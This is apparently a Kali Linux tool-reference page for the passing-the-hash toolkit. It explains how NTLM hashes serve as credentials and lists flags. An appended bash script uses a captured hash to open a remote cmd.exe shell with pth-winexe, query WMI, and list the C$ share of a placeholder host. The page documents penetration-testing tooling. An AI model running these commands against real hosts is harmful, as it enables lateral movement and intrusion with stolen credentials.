Post Exploitation
Tags: pth, pass-the-hash, samba, curl, smbclient, winexe, wmic, authentication

Passing the Hash

Patched tools to use password hashes as authentication input instead of plaintext passwords. Contains modified versions of Curl, Iceweasel, FreeTDS, Samba 4, WinEXE and WMI prefixed with 'pth-'.

Description

The passing-the-hash package provides modified versions of common network tools that support authentication using NTLM password hashes rather than requiring plaintext passwords. This enables post-exploitation scenarios where an attacker has obtained password hashes from a compromised system but lacks the actual passwords.

Tools are installed as executables starting with the 'pth-' prefix, such as pth-curl, pth-smbclient, pth-winexe, and pth-wmic. These patched binaries integrate hash-based authentication into protocols like SMB, HTTP, WMI, and RPC, facilitating lateral movement and remote administration without password cracking.

Use cases include authenticating to Windows shares, executing remote commands, querying WMI, and interacting with Samba services using stolen NTLM hashes. The package depends on various libraries including libc6, libgnutls30t64, samba-common-bin, and smbclient.

How It Works

The tools are patched versions of standard utilities (Curl, Samba tools, Winexe, WMI client) that accept an NT hash in place of the password, either through a dedicated option such as --pw-nt-hash or by putting the hash where the password would normally go. They work because NTLM never transmits the password or the hash: the client proves possession of the NT hash by using it as the key for the challenge-response computation (NTLMv1 DES-encrypts the server challenge with keys derived from the hash; NTLMv2 computes an HMAC-MD5 over the challenge and a client blob with a key derived from the hash, the username and the domain). The hash therefore is the credential, and whoever holds it can answer the challenge without ever learning the plaintext. Two practical limits follow: the target must still accept NTLM (a Kerberos-only or NTLM-disabled host will refuse), and remote use of a local administrator's hash is subject to the same UAC remote token filtering as a password logon, so local admins other than the built-in RID-500 account usually get a filtered token over the network unless LocalAccountTokenFilterPolicy is set. Binaries are prefixed with 'pth-' to distinguish them from the standard tools.

Installation

```bash
sudo apt install passing-the-hash
```

Flags

--pw-nt-hash                              The supplied password is the NT hash (pth-rpcclient)
-U, --user=[DOMAIN/]USERNAME[%PASSWORD]    Set the network username (pth-rpcclient, pth-wmic)
-N, --no-pass                             Don't ask for a password (pth-rpcclient, pth-wmic)
--password=STRING                         Password or hash (pth-rpcclient, pth-wmic)
-A, --authentication-file=FILE            Get the credentials from a file (pth-rpcclient, pth-wmic)
-p, --port=PORT                           Specify port number (pth-rpcclient)
-c, --command=COMMANDS                    Execute semicolon-separated commands (pth-rpcclient)
--runas=[DOMAIN\]USERNAME%PASSWORD        Run as the given user (pth-winexe)

Examples

Display help for pth-curl showing usage and options:
```bash
pth-curl -h
```
Display help for pth-net showing net commands like rpc, rap, ads:
```bash
pth-net -h
```
Display help for pth-rpcclient showing credential and connection options:
```bash
pth-rpcclient --help
```
Display help for pth-smbclient showing SMB connection options:
```bash
pth-smbclient --help
```
Display help for pth-smbget showing file download options:
```bash
pth-smbget --help
```
Display help for pth-sqsh showing Sybase connection flags:
```bash
pth-sqsh --help
```
Display help for pth-winexe showing remote execution options:
```bash
pth-winexe --help
```
Query WMI on a remote host using credentials:
```bash
pth-wmic -U [domain/]adminuser%password //host "select * from Win32_ComputerSystem"
```
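The examples above only show --help output and a plaintext password. The following is an added example, not from the Kali page or the pth toolkit, of driving the tools with a captured hash as described under How It Works. It assumes the toolkit's documented credential conventions: pth-winexe and pth-wmic take the hash in the password position as LM:NT, while the Samba-based tools (pth-smbclient, pth-rpcclient, pth-net) take the NT hash alone together with --pw-nt-hash. The target 10.0.0.5, the account CORP/Administrator and the hash values are placeholders; the only real constant is the well-known empty-LM hash, substituted when a dump provides just the NT half. Check each tool's --help before relying on the argument form.

```bash
#!/usr/bin/env bash
# Added example: build a pth-style credential from a captured NT hash and
# drive the patched tools with it. Target, user and hashes below are placeholders.

# Hash of the empty LM password; used when a dump provides only the NT hash.
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"

# is_hex32 STR -> success if STR is exactly 32 hexadecimal characters.
is_hex32() {
    case "$1" in
        *[!0-9a-fA-F]*) return 1 ;;
    esac
    [ "${#1}" -eq 32 ]
}

# pth_cred USER HASH -> prints USER%LM:NT, the form pth-winexe/pth-wmic accept.
# HASH may be "NT" (32 hex) or "LM:NT"; a missing LM half becomes EMPTY_LM.
# Rejects anything that is not two 32-hex-character values (typical copy/paste damage).
pth_cred() {
    user="$1" hash="$2"
    case "$hash" in
        *:*) lm="${hash%%:*}" nt="${hash#*:}" ;;
        *)   lm="$EMPTY_LM"    nt="$hash" ;;
    esac
    lm=$(printf '%s' "$lm" | tr 'A-F' 'a-f')
    nt=$(printf '%s' "$nt" | tr 'A-F' 'a-f')
    if ! is_hex32 "$lm" || ! is_hex32 "$nt"; then
        echo "pth_cred: '$hash' is not an NT hash or LM:NT pair" >&2
        return 1
    fi
    printf '%s%%%s:%s\n' "$user" "$lm" "$nt"
}

# nt_only CRED -> prints just the NT half of a USER%LM:NT credential,
# for the Samba-based tools that want --pw-nt-hash with the NT hash alone.
nt_only() {
    printf '%s\n' "${1##*:}"
}

# --- usage: placeholder target and hash; the pth-* calls run only if installed ---
TARGET="10.0.0.5"
PTH_USER="CORP/Administrator"
# Constructed NT hash (it is the well-known hash of the string "password").
CRED=$(pth_cred "$PTH_USER" "8846f7eaee8fb117ad06bdd830b7586c") || exit 1
NT=$(nt_only "$CRED")

if command -v pth-winexe >/dev/null 2>&1; then
    # Remote shell over SMB/RPC service creation, authenticated with the hash.
    pth-winexe -U "$CRED" "//$TARGET" cmd.exe
    # WMI query with the same LM:NT credential.
    pth-wmic -U "$CRED" "//$TARGET" "select Name,Domain from Win32_ComputerSystem"
    # Samba-based tool: NT hash only, flagged with --pw-nt-hash.
    pth-smbclient --pw-nt-hash -U "$PTH_USER%$NT" "//$TARGET/C\$" -c 'ls'
fi
```

If the target refuses with NT_STATUS_LOGON_FAILURE while the hash is known good, the usual causes are the limits noted under How It Works: NTLM disabled on the host, or a non-built-in local admin account whose remote token is filtered by UAC.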
Updated 2026-04-16 (source: kali.org)